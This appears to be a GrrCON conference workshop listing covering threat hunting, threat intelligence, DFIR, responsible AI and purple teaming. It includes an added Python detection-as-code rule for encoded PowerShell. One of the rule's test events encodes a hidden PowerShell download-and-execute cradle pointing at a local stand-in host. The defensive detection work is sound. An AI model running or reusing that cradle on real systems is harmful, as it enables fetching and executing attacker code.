GrrCON

Workshops

In addition to registration below, all Workshops have 10 seats available for walk-ins, though walk-in seats are NOT guaranteed.

ThreatOps Challenge

Description: Join your fellow cybersecurity peers in a race focused on identifying attack vectors, TTPs, and IOCs. This competition will be facilitated by SentinelOne engineers on the SentinelOne Singularity platform. No SentinelOne experience is required; an orientation will be provided to align your threat hunting skills and prepare you for the competition. Demonstrate your skills, resilience, and prowess as a true and effective Threat Hunter to earn fabulous prizes (and CPEs)! Bring your own laptop with a Wi-Fi connection to participate.

Pre-reqs and requirements:

• Attendees will need a laptop with Wi-Fi capabilities.

Date/Time:

Thursday Sept 28th 1-4pm – SOLD OUT
Friday Sept 29th 10am-1pm

Beyond Advanced Intel: Making your threat intelligence tactical

Description: Congratulations! You have just been hired as your company’s intelligence analyst. Your leadership team would like to know more about your company’s threat landscape and how to better invest their time and resources to tackle the threats the company is facing. You are now responsible for helping to answer this question. Traditionally, most intel analysts would tackle this question by looking externally at the larger cyber threat landscape. We need to shift this thinking toward more tactical intelligence. Threat intelligence teams should look internally at incident response cases and security tool outputs to determine the threat landscape. Finding cyber-attack patterns, determining where security tools could be improved, and providing context on what attacks are happening against the company can help leadership invest in the right security solutions and teams. Traditional intelligence training hasn’t focused on this more tactical approach to intelligence. This training is designed to help bridge that gap. It is a mix of classroom instruction, OSINT gathering, and writing, and it is designed to build skills no matter which systems you are using. Whether you are a team of one or part of a larger group, just starting out or well experienced, this training will provide you with skills that you can start using right away.

Pre-reqs and requirements:

• Attendees must bring a laptop with wireless connection capabilities.
• Notepad and pen are encouraged.

Date/Time:

Thursday Sept 28th
10am – 4pm

Intro to DFIR – Divide and Conquer

Description: A big challenge when learning about how to investigate endpoints and servers is keeping track of all of the artifacts that you need to consider. It’s a daunting list.

In our new incident response training course, you’ll learn Dr. Brian Carrier’s systematic approach to endpoint investigations and how to apply it: the “Divide & Conquer” process. This approach focuses on breaking down big, vague investigative questions, such as “is there malicious user activity?”, into smaller and smaller questions that can ultimately be answered by a category of artifacts, such as “Login Events.” The goal is to build a simple mental model of the important questions and artifact categories.

In this free course, you’ll learn…
1. A framework for categorizing artifacts that may contain DFIR evidence
2. How to analyze those artifact categories
3. Benefits of an automated approach.

It’s vendor agnostic, but Cyber Triage is used as a reference tool. Whether you’re new to this space or a veteran, this course will help ensure you’re tackling your next endpoint investigation with state-of-the-art techniques.

Pre-reqs and requirements:

• Attendees will need a laptop with Wi-Fi capabilities.

Date/Time:

Thursday Sept 28th 1-4pm

Say Yes to ChatGPT: Creating and Maintaining Responsible AI

Description: In this 4-hour workshop, participants will explore the tenets of creating, managing, and developing responsible Artificial Intelligence solutions and capabilities within an organization. Learn how to communicate, educate, and implement capabilities in a way that your board, executive team, and general user audience can understand and leverage to move forward.

Pre-reqs and requirements:

• Attendees will need a laptop with Wi-Fi capabilities.

Date/Time:

Friday Sept 29th 10am-2pm

Purple Teaming with Detection-as-Code for Modern SIEM

Description: One of the challenges for security teams is writing and deploying detections that generate actionable alerts with rich context while also reducing noisy alerts. This hands-on workshop will teach the fundamentals of Purple Teaming and detection-as-code to help you build new detections.

This session will show how to leverage Purple Team techniques to develop hypotheses for new detections and strengthen defenses against future attacks.

I will show how to use open-source offensive security tools to simulate attacks against lab infrastructure, use an investigative approach to learn from the results and build new detections, and manage those detections using detection-as-code principles to eliminate noise and false positives.
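To make the detection-as-code idea concrete, here is an added example that is not workshop material and not any SIEM vendor's code. It shows one Python rule in the common rule(event) -> bool shape, with an allowlist kept in code to tune out a known-good source, an alert title that carries context, and the rule's own tests in the same file. The event field names (process_name, command_line, parent_name, user, host), the allowlisted (parent, user) pair, and the sample events are constructed assumptions standing in for process-creation logs from a lab attack simulation.

```python
"""Detection-as-code: one Python rule, its tuning, and its tests in one file.

Added example, not code from the workshop or any SIEM vendor. Field names
and sample events are constructed assumptions standing in for
process-creation logs produced by a lab attack simulation.
"""
import base64
import binascii
import re
from typing import Optional

SEVERITY = "HIGH"

# Common spellings of PowerShell's -EncodedCommand switch followed by a
# base64 blob. The 16-character minimum skips trivially short values.
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"
)

# Noise reduction lives in code, so every allowlist change is reviewed and
# tested like any other change. Hypothetical known-good (parent, user) pair.
ALLOWLIST = {
    ("svchost.exe", "NT AUTHORITY\\SYSTEM"),  # assumed scheduled-task runner
}


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script, or None if there is no valid encoded blob.

    Malformed base64 is treated as 'not encoded' rather than raised, so one
    odd command line cannot crash the rule in production.
    """
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except binascii.Error:
        return None
    # PowerShell encodes the script as UTF-16LE.
    return raw.decode("utf-16-le", errors="replace")


def rule(event: dict) -> bool:
    """True when the event should raise an alert."""
    if event.get("process_name", "").lower() not in {"powershell.exe", "pwsh.exe"}:
        return False
    if decode_encoded_command(event.get("command_line", "")) is None:
        return False
    key = (event.get("parent_name", "").lower(), event.get("user", ""))
    return key not in ALLOWLIST


def title(event: dict) -> str:
    """Alert title carrying the context an analyst needs first."""
    decoded = decode_encoded_command(event.get("command_line", "")) or ""
    return (
        f"Encoded PowerShell by {event.get('user')} on {event.get('host')} "
        f"(parent {event.get('parent_name')}): {decoded[:60]!r}"
    )


def _encode(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events: one simulated attack, one tuned-out benign
# case, and three that must not fire (including malformed base64).
SAMPLE_EVENTS = [
    {"id": "attack", "host": "ws01", "user": "CORP\\alice",
     "process_name": "powershell.exe", "parent_name": "winword.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + _encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/stage.ps1')")},
    {"id": "allowlisted", "host": "ws01", "user": "NT AUTHORITY\\SYSTEM",
     "process_name": "powershell.exe", "parent_name": "svchost.exe",
     "command_line": "powershell.exe -EncodedCommand " + _encode("Get-Service")},
    {"id": "not_powershell", "host": "ws02", "user": "CORP\\bob",
     "process_name": "cmd.exe", "parent_name": "explorer.exe",
     "command_line": "cmd.exe /c whoami"},
    {"id": "plain", "host": "ws02", "user": "CORP\\bob",
     "process_name": "powershell.exe", "parent_name": "explorer.exe",
     "command_line": "powershell.exe -Command Get-Date"},
    {"id": "malformed", "host": "ws03", "user": "CORP\\carol",
     "process_name": "pwsh.exe", "parent_name": "explorer.exe",
     "command_line": "pwsh.exe -enc AAAAAAAAAAAAAAAAA"},  # 17 chars: bad padding
]


def evaluate(events: list) -> dict:
    """Run the rule over a batch; this is what a CI job would gate on."""
    return {event["id"]: rule(event) for event in events}


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        verdict = rule(event)
        print(f"{event['id']:>15}: {'ALERT' if verdict else 'pass'}"
              + (f"  {SEVERITY}  {title(event)}" if verdict else ""))
```

Run it directly to see which constructed events alert. The design point is that the allowlist, the severity and the expected verdicts are all versioned with the rule, so a tuning change that silences the simulated attack fails the tests before it reaches the SIEM.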

Who should attend?

This hands-on virtual workshop is perfect for detection and security teams who are expected to develop and write detections to support new log sources, threat models, and vulnerabilities that are exploited in the wild.

Pre-reqs and requirements:

• Attendees will need a laptop with Wi-Fi capabilities.

• Detections are written in Python, so some Python experience would be helpful.

Date/Time:

Thursday Sept 28th 10am-noon